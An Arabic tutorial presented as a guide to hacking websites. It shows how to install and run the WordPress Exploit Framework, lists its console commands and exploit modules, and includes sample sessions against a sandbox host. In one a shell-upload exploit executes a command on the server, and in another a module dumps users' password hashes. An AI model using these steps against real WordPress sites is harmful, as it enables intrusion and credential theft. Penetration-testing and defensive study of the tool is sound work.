اختراق مواقع الووردبريس WordPress Exploit Framework

اختراق مواقع-الووردبريس-WordPress-Exploit-Framework

كيفية اختراق المواقع الالكترونية

تعتبر بعض ادوات اختراق المواقع الالكترونية او الهكر ضرورية, إذا كنت تريد اختراق تطبيقات الويب والسيرفرات. طبعا المعرفة أساسية في كل شيء، وهذا يتضمن ايضا تعلم تقنيات القرصنة. 

لاختراق المواقع والسرفرات بالإضافة إلى تطبيقات الويب، يحتاج الفرد إلى معرفة بعض لغات البرمجة المهمة لتطوير المواقع ASP و PHP و SQL، وأمور أخرى. ستمكنك معرفة هذه اللغات جنبًا إلى جنب مع أساسيات شبكات الحاسب والانترنت الى رفع مستواك في الاختراق وزيادة الفعالية والكفائة.

 تسهل أدوات القرصنة الأمور على أي هكر لأنها تساعد في أتمتة مهام معنية. وتوفير الوقت في كتابة الاوامر المعقدة. علاوة على ذلك ، يمكن استخدام ادوات القرصنة لإيجاد العيوب في سكربت موقعك الخاص، إن معرفة العيوب الموجودة تساعد اصحاب المواقع على تقوية دفاعاتها بشكل أفضل ضد هجمات الهكر اصحاب القبعات السوداء. 

هناك الكثير من الأدوات والسكربتات المستخدمة في القرصنة يجب ان تكون معروفة عند الهكر  في هذا المقال سنتعرف على اداة قوية لاختراق مواقع الوردبرس. تشبه في طريقة التعامل معها مشروع الميتاسبلويت.

ماهو اطار اختراق مواقع الووردبريس WordPress Exploit Framework 

هو منصة عمل مفتوحة المصدر, مصممة للمساعدة في اختبار اختراق المواقع و تطبيقات الويب المركبة لسكربت ووردبريس WordPress وتنفيذ ثغرات واستغلالات على الموقع وطرق رفع الشيل والبايلود داخل السرفر.

متطلبات التشغيل :

  1.  Ruby > = 2.4.4
  2. نظام لينكس مثل: ويفضل كالي لينكس او باروت او باكبوكس...

كيفية تثبيت WordPress Exploit Framework

  • لتثبيت أحدث بنية مستقرة ، قم بفتح الترمينال و انسخ امر التثبيت:

gem install wpxf
bundle install
git clone https://github.com/rastating/wordpress-exploit-framework.git

  •  ندخل مجلد الاداة لتشغيلها

cd wordpress-exploit-framework

  • ثم نشغل السكربت بالامر

 ruby wpxf.rb

  • بعد التثبيت ، يمكنك تشغيل وحدة تحكم WordPress Exploit Framework ايضا عن طريق امر تشغيل  wpxf .

wpxf

على أنظمة دبيان:

إذا كنت تواجه مشكلات في تثبيت الاعتمادات WPXF (على وجه الخصوص ، Nokogiri) ، فتأكد أولاً من أن لديك كل الأدوات اللازمة لتجميع امتدادات ملفات لغة السي Objective-C :

  • لتثبيت الباتش patch وادوات التجميع build-essential:

sudo apt-get install build-essential patch
  • تثبيت المكتبات Library اللازمة للتطوير
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

كيفية استخدام اداة اختراق مواقع الوردبريس WordPress Exploit Framework

  • قم بتشغيل الاداة عن طريق تشغيل الامر  wpxf
wpxf
بمجرد تشغيل الاداة، سيظهر لك موجه اوامر wpxf. 

اوامر اداة الاختراق WordPress Exploit Framework

  1. search - للبحث عن الثغرات.
  2. use - استخدام ثغرة.
  3. set - تعيين بارمترات .
  4. run - بدأ الاختراق.
  5. info - معلومات عن البايلود او الثغرة.
  6. show options - اظهار متطلبات او بارمترات الثغرة لتستخدمها بالامر set بعد ذلك.
  7. show exploits - عرض جميع الاستغلالات.
  8. show auxiliary - لم اعرف ترجمتها 😆 لكنها تعرض الادوات المساعدة للاختراق.
  9. show advanced - عرض خيارات متقدمة.
  10. back - رجوع للخلف.
  11. check - فحص الاستغلال.
  12. creds لمسح الاعتمادات credential.
  13. clear - مسح الشاشة.
  14. quite - الخروج من الاداة.
  15. rebuild_cache - اعادة بناء او عمل ريفرش للاستغلالات التي اضفتها.
اترككم لتتعرفو بانفسكم 😈على بقية الاوامر مثل loot و gset و غيرهم...
  • لعرض جميع الثغرات او الاستغلالات exploits الموجودة بقاعدة البيانات الخاصة بالاداة نستخدم الامر show exploits
wpxf > show exploits

  [+] 289 Exploits

      Module                                                    Title
      --------------------------------------------------------  --------------------------------------------
      exploit/rfi/advanced_custom_fields_remote_file_inclusion  Advanced Custom Fields Remote File Inclusion
      exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload        Fast Image Adder <= 1.1 RFI Shell Upload
      exploit/rfi/flickr_picture_backup_rfi_shell_upload        Flickr Picture Backup RFI Shell Upload
      exploit/rfi/gwolle_guestbook_remote_file_inclusion        Gwolle Guestbook Remote File Inclusion
      exploit/rfi/wp_mobile_detector_rfi_shell_upload           WP Mobile Detector RFI Shell Upload
...
wpxf >
يمكنك البحث عن الثغرات باستخدام  أمر البحث Search
wpxf > search rfi

  [+] 3 Results for "rfi"

      Module                                               Title
      --------------------------------------------------   ----------------------------------------
      exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload   Fast Image Adder <= 1.1 RFI Shell Upload
      exploit/rfi/flickr_picture_backup_rfi_shell_upload   Flickr Picture Backup RFI Shell Upload
      exploit/rfi/wp_mobile_detector_rfi_shell_upload      WP Mobile Detector RFI Shell Upload

wpxf >
  • لاستغلال ثغرة ( symposium_shell_uploadمن ثغرات المواقع الموجودة بالاداة نستخدم الامر use
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf
نقوم بتعيين set خيارات او برامترات الاستغلال اللازمة وبدأ الاختراق run
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/shell/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/shell/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
تم الاختراق😀

مثال اخر لثغرة سحب الباسوردات من المواقع simple_hash_dump

wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run

  [-] Determining database prefix...
  [-] Dumping user hashes...

      Username   Hash
      --------   -----------------------------------
      root       $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
      ATgVrF     $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
      DOWzVC     $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
      OmQUqt     $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
      eFhkJv     $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.

  [+] Execution finished successfully

wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >